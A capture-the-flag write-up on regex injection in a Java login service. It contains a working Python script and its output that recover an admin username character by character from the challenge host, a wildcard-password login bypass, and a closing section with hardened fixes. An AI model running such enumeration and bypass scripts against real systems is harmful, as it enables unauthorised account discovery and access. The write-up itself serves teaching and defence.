Two Java files are given. Analyzing both, we can see that in the first file there is an “if condition” that uses string.match on the username to check whether it exists. Knowing this, we can recover the admin username character by character with a Python script, using regex injection.
```python
import requests
import string

URL = 'http://problems.ctfx.io:7003/users'
EXISTS = "FAILED: User with that name already exists!"

username = ''
lower_alpha = '[a-z]'
upper_alpha = '[A-Z]'
digits = '[0-9]'
special = r'[^\w]'
regex_string = ''
# Candidate characters for each character class
d = {lower_alpha: string.ascii_lowercase,
     upper_alpha: string.ascii_uppercase,
     digits: string.digits,
     special: string.punctuation + string.whitespace}
regex = [lower_alpha, upper_alpha, digits, special]
char_found = True
regex_found = True

while regex_found:
    regex_found = False
    for r in regex:
        while True:
            # First find which character class the next character belongs to
            a = requests.post(URL, data={'username': '^%s.*' % (regex_string + r),
                                         'password': 'a', 'realname': 'a'})
            if a.status_code != 200:
                continue  # retry on server errors
            if EXISTS in a.text:
                regex_found = True
                char_found = True
                regex_string += r
                # Then try every character of that class
                for x in d[r]:
                    char_found = False
                    # Escape regex metacharacters once, before the retry loop
                    if x in r'\.[]{}()*+-?^$|':
                        x = '\\' + x
                    while True:
                        a = requests.post(URL, data={'username': '^(%s).*' % (username + x),
                                                     'password': 'a', 'realname': 'a'})
                        if a.status_code != 200:
                            continue  # retry on server errors
                        if EXISTS in a.text:
                            username += x
                            char_found = True
                            print("The username: " + username)
                        break
                    if char_found:
                        break
            break
```
```
kinyabitch@Debian ~/h/c/c/web2> python a.py
The username: \[
The username: \[A
The username: \[Ad
The username: \[Adm
The username: \[Admi
The username: \[Admin
The username: \[Admin\]
The username: \[Admin\]
The username: \[Admin\] A
The username: \[Admin\] Ar
The username: \[Admin\] Arx
The username: \[Admin\] Arxe
The username: \[Admin\] Arxen
The username: \[Admin\] Arxeni
The username: \[Admin\] Arxenix
The username: \[Admin\] Arxenixi
The username: \[Admin\] Arxenixis
The username: \[Admin\] Arxenixisa
The username: \[Admin\] Arxenixisal
The username: \[Admin\] Arxenixisalo
The username: \[Admin\] Arxenixisalos
The username: \[Admin\] Arxenixisalose
The username: \[Admin\] Arxenixisaloser
```
In the second one we can see that it does the same thing, but now with the password. So now that we have the admin username, we can just inject this regex “^*.” as the password and get the flag :)
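For the defensive side, here is an added example (not the challenge's Java source, which this write-up does not reproduce) that models in Python the two checks described above next to hardened versions. The account data, all function names, whole-string matching via `re.fullmatch`, and the PBKDF2 parameters are assumptions made for illustration.

```python
import hashlib
import hmac
import re

# Constructed sample account; not the challenge's real data.
NAME, PASSWORD = "[Admin] Example", "constructed-password"
PLAIN_DB = {NAME: PASSWORD}  # regex-matching a password implies plaintext storage
SALT = b"constructed-salt"   # assumption: a real system uses a random per-user salt
HASH_DB = {NAME: hashlib.pbkdf2_hmac("sha256", PASSWORD.encode(), SALT, 100_000)}


def _matches(pattern, value):
    """Use attacker-controlled input as a regex (the flaw being modelled)."""
    try:
        return re.fullmatch(pattern, value) is not None
    except re.error:
        return False


def exists_vulnerable(submitted):
    # Each True/False answer leaks one fact about a stored username.
    return any(_matches(submitted, name) for name in PLAIN_DB)


def exists_fixed(submitted):
    # Exact lookup: the input is data, never a pattern.
    return submitted in HASH_DB


def login_vulnerable(username, password):
    stored = PLAIN_DB.get(username)
    return stored is not None and _matches(password, stored)


def login_fixed(username, password):
    stored = HASH_DB.get(username)
    if stored is None:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)
    # Constant-time comparison of password hashes
    return hmac.compare_digest(stored, candidate)
```

If pattern matching on user input is genuinely required, quoting the input first (`re.escape` in Python, `Pattern.quote` in Java) makes it match only as a literal.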